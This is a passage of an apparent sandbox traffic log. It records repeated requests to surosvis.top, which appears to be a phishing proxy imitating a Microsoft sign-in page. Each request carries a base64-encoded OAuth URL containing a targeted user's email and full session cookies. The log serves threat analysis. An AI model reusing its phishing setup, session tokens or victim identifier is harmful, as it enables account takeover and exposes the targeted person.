buid=0.AcoAMe_N-B6jSkuT5F9XHpElWgIAAAAAAPEPzgAAAAAAAAABAAA.AQABGgEAAAApTwJmzXqdR4BN2miheQMYkM8kEq6J_TqLxIEzQLsumjMivj4zri0-eVnGF8LVRXvHN80YL1Boo4N4vPaKLChNLLdt1aK7ohMo2j1IuY3h80fDnRFWYCX29GgBbZ8TE90gAA; esctx=PAQABBwEAAAApTwJmzXqdR4BN2miheQMYuR10CMjwaOfEbSWdjUV4o12tURH02Cx3glnylDoklPMrbTdcrZHU6ecFW56pH3QKmnLvYGZAjeskoL5JaQrtFzFIrmeoy2mHjfMjzVmEXI8cE5g-fbVq413cPjmjYUkO9Vbxjqda5YtwuPdwMh5CIr21Sx-2ybgzhhO53N4uWUUgAA; esctx-2mxyQonV0Zs=AQABCQEAAAApTwJmzXqdR4BN2miheQMYWPCGYCYTPVD-2_nCVHAbVTf87Ml6fHBz64tqGSkQBfWVT6USqRDy70Y0QJh0pFsy5Z57mj2bxgQH2lVjm1LJF2XIJt57eISWeYJVGD6eIR_lDOD0SZ9JGuooObCX9ubcxJR22BNOM1dCo146im0AxSAA; fpc=AnD2-tLeUdlArJB7oI4062WerOTJAQAAAPZ9H94OAAAA; brcap=0
Source: global traffic	HTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico HTTP/1.1Host: surosvis.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://surosvis.top/?5ygx0kwei=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1jaGlnbGV5JTQwbGl2ZS1xdWlubi5jb20mY2xpZW50LXJlcXVlc3QtaWQ9Y2NiNjg2MjYtODJmNy00YmQ1LWIzZWYtMDhiMzhlY2M2MzA3JnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODU2MTQ3OTU0ODY5NTQxNy42YmNiM2RmMC1iNDhlLTRlMDktYWUxNS0xZGZlZjUwYjU5NzQmc3RhdGU9RGN0TkRzSWdFRUJoMExPNGNFRUw2UXdfQy1OUlRLRkRPd21GbU5nYWJ5LUw5LTJlRkVKY2U1ZWUxQjNoN09UUkduQUJ3ZHVPY1lPTktVNUwxaXFDSndXa2c1ckpvREpMcG93NlluQWctM3NmMjNjZW42V3RYRjhiMTg4amJid1ctdDFBRno1SnZRLXVkVWh0X3dN&sso_reload=trueAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=6EHt3yYYhEzf; qPdM.sig=hlFz_VDQY766F2hmVBZXTNSu8mc; ClientId=CE0196B9CD1B497F9E5A407506480463; OIDC=1; OpenIdConnect.nonce.v3.RtPlv-V6bGGs0Y8zTVeXciGoosBeC6rZZ0vafGfOZ18=638561479548695417.6bcb3df0-b48e-4e09-ae15-1dfef50b5974; X-OWA-RedirectHistory=ArLym14BeXO_S0ig3Ag; esctx-XzUyERacrcw=AQABCQEAAAApTwJmzXqdR4BN2miheQMY4LpMm3o2SXJYuMM1yJdoBjrc26M2cv_fSiTwqneuLiQxS3Jbr4JMxsFOMvSHfPI16tXgX26mXTSr4mfplSdM9iYaeg59a0-h2iZh8LD__ryUeBFg6JOikENPWCO351z7HXMPcVJQODNEEnOkj2k84CAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA\|NoExtension; SSOCOOKIEPULLED=1; buid=0.AcoAMe_N-B6jSkuT5F9XHpElWgIAAAAAAPEPzgAAAAAAAAABAAA.AQABGgEAAAApTwJmzXqdR4BN2miheQMYkM8kEq6J_TqLxIEzQLsumjMivj4zri0-eVnGF8LVRXvHN80YL1Boo4N4vPaKLChNLLdt1aK7ohMo2j1IuY3h80fDnRFWYCX29GgBbZ8TE90gAA; esctx=PAQABBwEAAAApTwJmzXqdR4BN2miheQMYuR10CMjwaOfEbSWdjUV4o12tURH02Cx3glnylDoklPMrbTdcrZHU6ecFW56pH3QKmnLvYGZAjeskoL5JaQrtFzFIrmeoy2mHjfMjzVmEXI8cE5g-fbVq413cPjmjYUkO9Vbxjqda5YtwuPdwMh5CIr21Sx-2ybgzhhO53N4uWUUgAA; esctx-2mxyQonV0Zs=AQABCQEAAAApTwJmzXqdR4BN2miheQMYWPCGYCYTPVD-2_nCVHAbVTf87Ml6fHBz64tqGSkQBfWVT6USqRDy70Y0QJh0pFsy5Z57mj2bxgQH2lVjm1LJF2XIJt57eISWeYJVGD6eIR_lDOD0SZ9JGuooObCX9ubcxJR22BNOM1dCo146im0AxSAA; fpc=AnD2-tLeUdlArJB7oI4062WerOTJAQAAAPZ9H94OAAAA; brcap=0
Source: global traffic	HTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/images/applogos/53_8b36337037cff88c3df203bb73d58e41.png HTTP/1.1Host: surosvis.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://surosvis.top/?5ygx0kwei=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1jaGlnbGV5JTQwbGl2ZS1xdWlubi5jb20mY2xpZW50LXJlcXVlc3QtaWQ9Y2NiNjg2MjYtODJmNy00YmQ1LWIzZWYtMDhiMzhlY2M2MzA3JnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODU2MTQ3OTU0ODY5NTQxNy42YmNiM2RmMC1iNDhlLTRlMDktYWUxNS0xZGZlZjUwYjU5NzQmc3RhdGU9RGN0TkRzSWdFRUJoMExPNGNFRUw2UXdfQy1OUlRLRkRPd21GbU5nYWJ5LUw5LTJlRkVKY2U1ZWUxQjNoN09UUkduQUJ3ZHVPY1lPTktVNUwxaXFDSndXa2c1ckpvREpMcG93NlluQWctM3NmMjNjZW42V3RYRjhiMTg4amJid1ctdDFBRno1SnZRLXVkVWh0X3dN&sso_reload=trueAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=6EHt3yYYhEzf; qPdM.sig=hlFz_VDQY766F2hmVBZXTNSu8mc; ClientId=CE0196B9CD1B497F9E5A407506480463; OIDC=1; OpenIdConnect.nonce.v3.RtPlv-V6bGGs0Y8zTVeXciGoosBeC6rZZ0vafGfOZ18=638561479548695417.6bcb3df0-b48e-4e09-ae15-1dfef50b5974; X-OWA-RedirectHistory=ArLym14BeXO_S0ig3Ag; esctx-XzUyERacrcw=AQABCQEAAAApTwJmzXqdR4BN2miheQMY4LpMm3o2SXJYuMM1yJdoBjrc26M2cv_fSiTwqneuLiQxS3Jbr4JMxsFOMvSHfPI16tXgX26mXTSr4mfplSdM9iYaeg59a0-h2iZh8LD__ryUeBFg6JOikENPWCO351z7HXMPcVJQODNEEnOkj2k84CAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA\|NoExtension; SSOCOOKIEPULLED=1; buid=0.AcoAMe_N-B6jSkuT5F9XHpElWgIAAAAAAPEPzgAAAAAAAAABAAA.AQABGgEAAAApTwJmzXqdR4BN2miheQMYkM8kEq6J_TqLxIEzQLsumjMivj4zri0-eVnGF8LVRXvHN80YL1Boo4N4vPaKLChNLLdt1aK7ohMo2j1IuY3h80fDnRFWYCX29GgBbZ8TE90gAA; esctx=PAQABBwEAAAApTwJmzXqdR4BN2miheQMYuR10CMjwaOfEbSWdjUV4o12tURH02Cx3glnylDoklPMrbTdcrZHU6ecFW56pH3QKmnLvYGZAjeskoL5JaQrtFzFIrmeoy2mHjfMjzVmEXI8cE5g-fbVq413cPjmjYUkO9Vbxjqda5YtwuPdwMh5CIr21Sx-2ybgzhhO53N4uWUUgAA; esctx-2mxyQonV0Zs=AQABCQEAAAApTwJmzXqdR4BN2miheQMYWPCGYCYTPVD-2_nCVHAbVTf87Ml6fHBz64tqGSkQBfWVT6USqRDy70Y0QJh0pFsy5Z57mj2bxgQH2lVjm1LJF2XIJt57eISWeYJVGD6eIR_lDOD0SZ9JGuooObCX9ubcxJR22BNOM1dCo146im0AxSAA; fpc=AnD2-tLeUdlArJB7oI4062WerOTJAQAAAPZ9H94OAAAA; brcap=0
Source: global traffic	HTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/images/marching_ants_white_166de53471265253ab3a456defe6da23.gif HTTP/1.1Host: surosvis.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=6EHt3yYYhEzf; qPdM.sig=hlFz_VDQY766F2hmVBZXTNSu8mc; ClientId=CE0196B9CD1B497F9E5A407506480463; OIDC=1; OpenIdConnect.nonce.v3.RtPlv-V6bGGs0Y8zTVeXciGoosBeC6rZZ0vafGfOZ18=638561479548695417.6bcb3df0-b48e-4e09-ae15-1dfef50b5974; X-OWA-RedirectHistory=ArLym14BeXO_S0ig3Ag; esctx-XzUyERacrcw=AQABCQEAAAApTwJmzXqdR4BN2miheQMY4LpMm3o2SXJYuMM1yJdoBjrc26M2cv_fSiTwqneuLiQxS3Jbr4JMxsFOMvSHfPI16tXgX26mXTSr4mfplSdM9iYaeg59a0-h2iZh8LD__ryUeBFg6JOikENPWCO351z7HXMPcVJQODNEEnOkj2k84CAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA\|NoExtension; SSOCOOKIEPULLED=1; buid=0.AcoAMe_N-B6jSkuT5F9XHpElWgIAAAAAAPEPzgAAAAAAAAABAAA.AQABGgEAAAApTwJmzXqdR4BN2miheQMYkM8kEq6J_TqLxIEzQLsumjMivj4zri0-eVnGF8LVRXvHN80YL1Boo4N4vPaKLChNLLdt1aK7ohMo2j1IuY3h80fDnRFWYCX29GgBbZ8TE90gAA; esctx=PAQABBwEAAAApTwJmzXqdR4BN2miheQMYuR10CMjwaOfEbSWdjUV4o12tURH02Cx3glnylDoklPMrbTdcrZHU6ecFW56pH3QKmnLvYGZAjeskoL5JaQrtFzFIrmeoy2mHjfMjzVmEXI8cE5g-fbVq413cPjmjYUkO9Vbxjqda5YtwuPdwMh5CIr21Sx-2ybgzhhO53N4uWUUgAA; esctx-2mxyQonV0Zs=AQABCQEAAAApTwJmzXqdR4BN2miheQMYWPCGYCYTPVD-2_nCVHAbVTf87Ml6fHBz64tqGSkQBfWVT6USqRDy70Y0QJh0pFsy5Z57mj2bxgQH2lVjm1LJF2XIJt57eISWeYJVGD6eIR_lDOD0SZ9JGuooObCX9ubcxJR22BNOM1dCo146im0AxSAA; fpc=AnD2-tLeUdlArJB7oI4062WerOTJAQAAAPZ9H94OAAAA; brcap=0
Source: global traffic	HTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg HTTP/1.1Host: surosvis.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://surosvis.top/?5ygx0kwei=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1jaGlnbGV5JTQwbGl2ZS1xdWlubi5jb20mY2xpZW50LXJlcXVlc3QtaWQ9Y2NiNjg2MjYtODJmNy00YmQ1LWIzZWYtMDhiMzhlY2M2MzA3JnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODU2MTQ3OTU0ODY5NTQxNy42YmNiM2RmMC1iNDhlLTRlMDktYWUxNS0xZGZlZjUwYjU5NzQmc3RhdGU9RGN0TkRzSWdFRUJoMExPNGNFRUw2UXdfQy1OUlRLRkRPd21GbU5nYWJ5LUw5LTJlRkVKY2U1ZWUxQjNoN09UUkduQUJ3ZHVPY1lPTktVNUwxaXFDSndXa2c1ckpvREpMcG93NlluQWctM3NmMjNjZW42V3RYRjhiMTg4amJid1ctdDFBRno1SnZRLXVkVWh0X3dN&sso_reload=trueAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=6EHt3yYYhEzf; qPdM.sig=hlFz_VDQY766F2hmVBZXTNSu8mc; ClientId=CE0196B9CD1B497F9E5A407506480463; OIDC=1; OpenIdConnect.nonce.v3.RtPlv-V6bGGs0Y8zTVeXciGoosBeC6rZZ0vafGfOZ18=638561479548695417.6bcb3df0-b48e-4e09-ae15-1dfef50b5974; X-OWA-RedirectHistory=ArLym14BeXO_S0ig3Ag; esctx-XzUyERacrcw=AQABCQEAAAApTwJmzXqdR4BN2miheQMY4LpMm3o2SXJYuMM1yJdoBjrc26M2cv_fSiTwqneuLiQxS3Jbr4JMxsFOMvSHfPI16tXgX26mXTSr4mfplSdM9iYaeg59a0-h2iZh8LD__ryUeBFg6JOikENPWCO351z7HXMPcVJQODNEEnOkj2k84CAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA\|NoExtension; SSOCOOKIEPULLED=1; buid=0.AcoAMe_N-B6jSkuT5F9XHpElWgIAAAAAAPEPzgAAAAAAAAABAAA.AQABGgEAAAApTwJmzXqdR4BN2miheQMYkM8kEq6J_TqLxIEzQLsumjMivj4zri0-eVnGF8LVRXvHN80YL1Boo4N4vPaKLChNLLdt1aK7ohMo2j1IuY3h80fDnRFWYCX29GgBbZ8TE90gAA; esctx=PAQABBwEAAAApTwJmzXqdR4BN2miheQMYuR10CMjwaOfEbSWdjUV4o12tURH02Cx3glnylDoklPMrbTdcrZHU6ecFW56pH3QKmnLvYGZAjeskoL5JaQrtFzFIrmeoy2mHjfMjzVmEXI8cE5g-fbVq413cPjmjYUkO9Vbxjqda5YtwuPdwMh5CIr21Sx-2ybgzhhO53N4uWUUgAA; esctx-2mxyQonV0Zs=AQABCQEAAAApTwJmzXqdR4BN2miheQMYWPCGYCYTPVD-2_nCVHAbVTf87Ml6fHBz64tqGSkQBfWVT6USqRDy70Y0QJh0pFsy5Z57mj2bxgQH2lVjm1LJF2XIJt57eISWeYJVGD6eIR_lDOD0SZ9JGuooObCX9ubcxJR22BNOM1dCo146im0AxSAA; fpc=AnD2-tLeUdlArJB7oI4062WerOTJAQAAAPZ9H94OAAAA; brcap=0
Source: global traffic	HTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/images/marching_ants_b540a8e518037192e32c4fe58bf2dbab.gif HTTP/1.1Host: surosvis.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=6EHt3yYYhEzf; qPdM.sig=hlFz_VDQY766F2hmVBZXTNSu8mc; ClientId=CE0196B9CD1B497F9E5A407506480463; OIDC=1; OpenIdConnect.nonce.v3.RtPlv-V6bGGs0Y8zTVeXciGoosBeC6rZZ0vafGfOZ18=638561479548695417.6bcb3df0-b48e-4e09-ae15-1dfef50b5974; X-OWA-RedirectHistory=ArLym14BeXO_S0ig3Ag; esctx-XzUyERacrcw=AQABCQEAAAApTwJmzXqdR4BN2miheQMY4LpMm3o2SXJYuMM1yJdoBjrc26M2cv_fSiTwqneuLiQxS3Jbr4JMxsFOMvSHfPI16tXgX26mXTSr4mfplSdM9iYaeg59a0-h2iZh8LD__ryUeBFg6JOikENPWCO351z7HXMPcVJQODNEEnOkj2k84CAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA\|NoExtension; SSOCOOKIEPULLED=1; buid=0.AcoAMe_N-B6jSkuT5F9XHpElWgIAAAAAAPEPzgAAAAAAAAABAAA.AQABGgEAAAApTwJmzXqdR4BN2miheQMYkM8kEq6J_TqLxIEzQLsumjMivj4zri0-eVnGF8LVRXvHN80YL1Boo4N4vPaKLChNLLdt1aK7ohMo2j1IuY3h80fDnRFWYCX29GgBbZ8TE90gAA; esctx=PAQABBwEAAAApTwJmzXqdR4BN2miheQMYuR10CMjwaOfEbSWdjUV4o12tURH02Cx3glnylDoklPMrbTdcrZHU6ecFW56pH3QKmnLvYGZAjeskoL5JaQrtFzFIrmeoy2mHjfMjzVmEXI8cE5g-fbVq413cPjmjYUkO9Vbxjqda5YtwuPdwMh5CIr21Sx-2ybgzhhO53N4uWUUgAA; esctx-2mxyQonV0Zs=AQABCQEAAAApTwJmzXqdR4BN2miheQMYWPCGYCYTPVD-2_nCVHAbVTf87Ml6fHBz64tqGSkQBfWVT6USqRDy70Y0QJh0pFsy5Z57mj2bxgQH2lVjm1LJF2XIJt57eISWeYJVGD6eIR_lDOD0SZ9JGuooObCX9ubcxJR22BNOM1dCo146im0AxSAA; fpc=AnD2-tLeUdlArJB7oI4062WerOTJAQAAAPZ9H94OAAAA; brcap=0
Source: global traffic	HTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/images/appbackgrounds/49-small_e58aafc980614a9cd7796bea7b5ea8f0.jpg HTTP/1.1Host: surosvis.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=6EHt3yYYhEzf; qPdM.sig=hlFz_VDQY766F2hmVBZXTNSu8mc; ClientId=CE0196B9CD1B497F9E5A407506480463; OIDC=1; OpenIdConnect.nonce.v3.RtPlv-V6bGGs0Y8zTVeXciGoosBeC6rZZ0vafGfOZ18=638561479548695417.6bcb3df0-b48e-4e09-ae15-1dfef50b5974; X-OWA-RedirectHistory=ArLym14BeXO_S0ig3Ag; esctx-XzUyERacrcw=AQABCQEAAAApTwJmzXqdR4BN2miheQMY4LpMm3o2SXJYuMM1yJdoBjrc26M2cv_fSiTwqneuLiQxS3Jbr4JMxsFOMvSHfPI16tXgX26mXTSr4mfplSdM9iYaeg59a0-h2iZh8LD__ryUeBFg6JOikENPWCO351z7HXMPcVJQODNEEnOkj2k84CAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA\|NoExtension; SSOCOOKIEPULLED=1; buid=0.AcoAMe_N-B6jSkuT5F9XHpElWgIAAAAAAPEPzgAAAAAAAAABAAA.AQABGgEAAAApTwJmzXqdR4BN2miheQMYkM8kEq6J_TqLxIEzQLsumjMivj4zri0-eVnGF8LVRXvHN80YL1Boo4N4vPaKLChNLLdt1aK7ohMo2j1IuY3h80fDnRFWYCX29GgBbZ8TE90gAA; esctx=PAQABBwEAAAApTwJmzXqdR4BN2miheQMYuR10CMjwaOfEbSWdjUV4o12tURH02Cx3glnylDoklPMrbTdcrZHU6ecFW56pH3QKmnLvYGZAjeskoL5JaQrtFzFIrmeoy2mHjfMjzVmEXI8cE5g-fbVq413cPjmjYUkO9Vbxjqda5YtwuPdwMh5CIr21Sx-2ybgzhhO53N4uWUUgAA; esctx-2mxyQonV0Zs=AQABCQEAAAApTwJmzXqdR4BN2miheQMYWPCGYCYTPVD-2_nCVHAbVTf87Ml6fHBz64tqGSkQBfWVT6USqRDy70Y0QJh0pFsy5Z57mj2bxgQH2lVjm1LJF2XIJt57eISWeYJVGD6eIR_lDOD0SZ9JGuooObCX9ubcxJR22BNOM1dCo146im0AxSAA; fpc=AnD2-tLeUdlArJB7oI4062WerOTJAQAAAPZ9H94OAAAA; brcap=0
Source: global traffic	HTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico HTTP/1.1Host: surosvis.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=6EHt3yYYhEzf; qPdM.sig=hlFz_VDQY766F2hmVBZXTNSu8mc; ClientId=CE0196B9CD1B497F9E5A407506480463; OIDC=1; OpenIdConnect.nonce.v3.RtPlv-V6bGGs0Y8zTVeXciGoosBeC6rZZ0vafGfOZ18=638561479548695417.6bcb3df0-b48e-4e09-ae15-1dfef50b5974; X-OWA-RedirectHistory=ArLym14BeXO_S0ig3Ag; esctx-XzUyERacrcw=AQABCQEAAAApTwJmzXqdR4BN2miheQMY4LpMm3o2SXJYuMM1yJdoBjrc26M2cv_fSiTwqneuLiQxS3Jbr4JMxsFOMvSHfPI16tXgX26mXTSr4mfplSdM9iYaeg59a0-h2iZh8LD__ryUeBFg6JOikENPWCO351z7HXMPcVJQODNEEnOkj2k84CAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA\|NoExtension; SSOCOOKIEPULLED=1; buid=0.AcoAMe_N-B6jSkuT5F9XHpElWgIAAAAAAPEPzgAAAAAAAAABAAA.AQABGgEAAAApTwJmzXqdR4BN2miheQMYkM8kEq6J_TqLxIEzQLsumjMivj4zri0-eVnGF8LVRXvHN80YL1Boo4N4vPaKLChNLLdt1aK7ohMo2j1IuY3h80fDnRFWYCX29GgBbZ8TE90gAA; esctx=PAQABBwEAAAApTwJmzXqdR4BN2miheQMYuR10CMjwaOfEbSWdjUV4o12tURH02Cx3glnylDoklPMrbTdcrZHU6ecFW56pH3QKmnLvYGZAjeskoL5JaQrtFzFIrmeoy2mHjfMjzVmEXI8cE5g-fbVq413cPjmjYUkO9Vbxjqda5YtwuPdwMh5CIr21Sx-2ybgzhhO53N4uWUUgAA; esctx-2mxyQonV0Zs=AQABCQEAAAApTwJmzXqdR4BN2miheQMYWPCGYCYTPVD-2_nCVHAbVTf87Ml6fHBz64tqGSkQBfWVT6USqRDy70Y0QJh0pFsy5Z57mj2bxgQH2lVjm1LJF2XIJt57eISWeYJVGD6eIR_lDOD0SZ9JGuooObCX9ubcxJR22BNOM1dCo146im0AxSAA; fpc=AnD2-tLeUdlArJB7oI4062WerOTJAQAAAPZ9H94OAAAA; brcap=0
Source: global traffic	HTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg HTTP/1.1Host: surosvis.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=6EHt3yYYhEzf; qPdM.sig=hlFz_VDQY766F2hmVBZXTNSu8mc; ClientId=CE0196B9CD1B497F9E5A407506480463; OIDC=1; OpenIdConnect.nonce.v3.RtPlv-V6bGGs0Y8zTVeXciGoosBeC6rZZ0vafGfOZ18=638561479548695417.6bcb3df0-b48e-4e09-ae15-1dfef50b5974; X-OWA-RedirectHistory=ArLym14BeXO_S0ig3Ag; esctx-XzUyERacrcw=AQABCQEAAAApTwJmzXqdR4BN2miheQMY4LpMm3o2SXJYuMM1yJdoBjrc26M2cv_fSiTwqneuLiQxS3Jbr4JMxsFOMvSHfPI16tXgX26mXTSr4mfplSdM9iYaeg59a0-h2iZh8LD__ryUeBFg6JOikENPWCO351z7HXMPcVJQODNEEnOkj2k84CAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA\|NoExtension; SSOCOOKIEPULLED=1; buid=0.AcoAMe_N-B6jSkuT5F9XHpElWgIAAAAAAPEPzgAAAAAAAAABAAA.AQABGgEAAAApTwJmzXqdR4BN2miheQMYkM8kEq6J_TqLxIEzQLsumjMivj4zri0-eVnGF8LVRXvHN80YL1Boo4N4vPaKLChNLLdt1aK7ohMo2j1IuY3h80fDnRFWYCX29GgBbZ8TE90gAA; esctx=PAQABBwEAAAApTwJmzXqdR4BN2miheQMYuR10CMjwaOfEbSWdjUV4o12tURH02Cx3glnylDoklPMrbTdcrZHU6ecFW56pH3QKmnLvYGZAjeskoL5JaQrtFzFIrmeoy2mHjfMjzVmEXI8cE5g-fbVq413cPjmjYUkO9Vbxjqda5YtwuPdwMh5CIr21Sx-2ybgzhhO53N4uWUUgAA; esctx-2mxyQonV0Zs=AQABCQEAAAApTwJmzXqdR4BN2miheQMYWPCGYCYTPVD-2_nCVHAbVTf87Ml6fHBz64tqGSkQBfWVT6USqRDy70Y0QJh0pFsy5Z57mj2bxgQH2lVjm1LJF2XIJt57eISWeYJVGD6eIR_lDOD0SZ9JGuooObCX9ubcxJR22BNOM1dCo146im0AxSAA; fpc=AnD2-tLeUdlArJB7oI4062WerOTJAQAAAPZ9H94OAAAA; brcap=0
Source: global traffic	HTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/images/applogos/53_8b36337037cff88c3df203bb73d58e41.png HTTP/1.1Host: surosvis.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=6EHt3yYYhEzf; qPdM.sig=hlFz_VDQY766F2hmVBZXTNSu8mc; ClientId=CE0196B9CD1B497F9E5A407506480463; OIDC=1; 